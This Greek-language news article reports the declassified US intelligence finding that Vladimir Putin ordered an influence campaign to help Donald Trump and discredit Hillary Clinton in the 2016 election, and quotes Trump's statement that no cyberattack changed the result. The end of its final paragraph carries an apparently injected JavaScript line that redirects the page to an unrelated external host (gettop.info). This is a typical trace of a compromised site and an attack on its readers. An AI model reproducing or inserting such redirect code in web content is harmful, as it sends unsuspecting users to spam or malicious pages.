ΗΠΑ: Ο Πούτιν διέταξε «εκστρατεία επιρροής» για τον Τραμπ

0
17
Two powers

 

Εντολή για τη διεξαγωγή «εκστρατείας επιρροής» στις προεδρικές εκλογές των ΗΠΑ προς όφελος του Ρεπουμπλικανού υποψηφίου Ντόναλντ Τραμπ και με στόχο τη δυσφήμηση της Δημοκρατικής Χίλαρι Κλίντον, φέρεται να έδωσε ο Ρώσος πρόεδρος Βλαντίμιρ Πούτιν σύμφωνα με αποχαρακτηρισμένη έκθεση των μυστικών υπηρεσιών πληροφοριών.

«Με βάση την περαιτέρω αξιολόγηση μας, ο Πούτιν και η ρωσική κυβέρνηση ανέπτυξαν μια ξεκάθαρη προτίμηση για τον εκλεγμένο πρόεδρο Τραμπ. Επίσης αξιολογούμε ότι ο Πούτιν και η ρωσική κυβέρνηση επιδίωξαν να αυξήσουν τις πιθανότητες εκλογής του Τραμπ εκμεταλλευόμενοι κάθε δυνατή ευκαιρία δυσφημώντας την πρώην υπουργό Κλίντον κάνοντάς τη δημοσίως ανεπιθύμητη σε σύγκριση με τον Τραμπ» αναφέρεται μεταξύ άλλων στην έκθεση, όπου επιπλέον αποσαφηνίζεται πως η «εκστρατεία επιρροής» της Μόσχας ήταν μέρος μιας «επικοινωνιακής στρατηγικής» εμπνευσμένη από σοβιετικές μεθόδους, που περιελάμβανε «μυστικές επιχειρήσεις, κρατικά μέσα ενημέρωσης, συμμετοχή τρίτων και πληρωμένους χρήστες των μέσων κοινωνικής δικτύωσης, ή τρολ».

Τα συμπεράσματα της έκθεσης βασίστηκαν σε πληροφορίες από το Ομοσπονδιακό Γραφείο Έρευνας (FBI), την υπηρεσία κατασκοπείας (CIA) και την υπηρεσία εθνικής ασφαλείας (NSA).

Η έκθεση αναρτήθηκε στον ιστότοπο της Διεύθυνσης Εθνικών Πληροφοριών (DNI) που συντονίζει τις 17 υπηρεσίες πληροφοριών των ΗΠΑ.

Ο πρόεδρος των ΗΠΑ Μπαράκ Ομπάμα που έδωσε την εντολή για την κατάρτιση της έκθεσης, ενημερώθηκε την Πέμπτη για το περιεχόμενο της.

Ο Ντόναλντ Τραμπ, μετά την ενημέρωση που είχε χθες από τους επικεφαλής των υπηρεσιών πληροφοριών (DNI, FBI, CIA και NSA) δήλωσε ότι καμία κυβερνοεπίθεση δεν επηρέασε τα αποτελέσματα των προεδρικών εκλογών της 8ης Νοεμβρίου στις ΗΠΑ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here